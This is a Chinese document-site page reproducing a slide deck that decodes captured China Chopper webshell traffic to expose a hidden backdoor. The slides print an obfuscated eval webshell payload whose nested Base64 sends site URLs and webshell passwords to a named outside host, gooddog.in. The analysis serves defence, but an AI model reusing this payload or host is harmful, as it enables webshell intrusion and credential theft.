网站大量收购独家精品文档,联系QQ:2885784924

K飞刀解密过狗菜刀后门.pptVIP

  1. 1、本文档共9页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
K飞刀解密过狗菜刀后门

* 解密过狗菜刀后门 K8拉登哥哥 K8飞刀--解密过狗菜刀后门 菜刀通讯主要用到URL编码和Base64编码加密, 下面是是菜刀连接PHP一句话执行的动作之一 想看一款web渗透相关工具有无后门,我们就得抓包解密看它的代码里有无问题. tom=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3Bz0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVuYjI5a1pHOW5MbWx1TDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuIi8iLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJ8PC0iKTtkaWUoKTs%3Dz1=QzpcXEFBV1NlcnZlclxcd3d3XFxwaHBcXA%3D%3D K8飞刀--解密过狗菜刀后门 0x001 打开菜刀 随便执行一个动作 使用Wsexplorer抓包(同类工具均可) K8飞刀--解密过狗菜刀后门 0x002 对提交的包进行解密 里面有很多百分号 我们先使用URL编码来解 如果执行动作中带有中文就使用 GB2312来解 全英文GB2312和UTF-8均可 K8飞刀--解密过狗菜刀后门 0x003 解密后 我们会看到有两个参数都经过Base64加密 先解密z1 K8飞刀--解密过狗菜刀后门 0x004 解密z0 K8飞刀--解密过狗菜刀后门 0x005 解密后发现z0参数里面 还有一层Base64加密 这是正常菜刀所没有的 肯定有问题,我们接着解密 K8飞刀--解密过狗菜刀后门 最后 解密后 我们可以很清楚的看到 被人加入的后门地址 好一招螳螂捕蝉黄雀在后 后门地址 :http://www.gooddog.in/Api.php 中间有被干过...目前还在运作... 本文以存在后门的过狗菜刀为例...大家要学会举一反三 更高明的作者加密更多或更隐蔽 建议大家使用工具时注意好几点 1 最好从官方下载 2 必须检测有无后门 谢谢观赏 K8搞基大队 搞基有害,但是健康。 @k8gege @k8team *

文档评论(0)

qiwqpu54 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档